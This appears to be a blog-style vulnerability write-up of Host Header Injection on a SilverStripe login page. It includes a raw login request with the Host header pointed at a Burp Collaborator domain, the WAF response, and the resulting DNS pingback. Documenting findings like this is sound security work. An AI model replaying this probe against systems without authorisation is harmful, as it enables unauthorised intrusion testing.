Description
- It was noted that the application was vulnerable to Host Header Injection in the login page
Host Header Injection #1:
Steps to Reproduce:
- Login and change the Host header to Burp Collab domain
- Upon logging in the Collab would get a hit from the IP of the app
// HTTP Post Request
POST /Security/login/default/LoginForm HTTP/1.1
Host: 7ksb89bppmbvc3po6ma6x72n7ed51wtki.oastify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0
[...]
AuthenticationMethod=SilverStripe%5CSecurity%5CMemberAuthenticator%5CMemberAuthenticator&Email=admin&Password=password&SecurityID=5afbb1fab346375510939ba7b65499e556b0251c&action_doLogin=Log+in
// HTTP Response
HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Cache-Control: no-cache, no-store
[...]
<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=27&xinfo=1014-115438578-0%200NNN%20RT%281755353110306%2067%29%20q%280%20-1%20-1%20-1%29%20r%284%20-1%29&incident_id=0-468567604813498382&edet=22&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-468567604813498382</iframe></body></html>
// Burp Collab domain hit
The Collaborator server received a DNS lookup of type CNAME for the domain name www.7ksb89bppmbvc3po6ma6x72n7ed51wtki.oastify.com.
The lookup was received from IP address 149.126.76.44:7396 at 2025-Aug-16 14:05:10.562 UTC.
No comments:
Post a Comment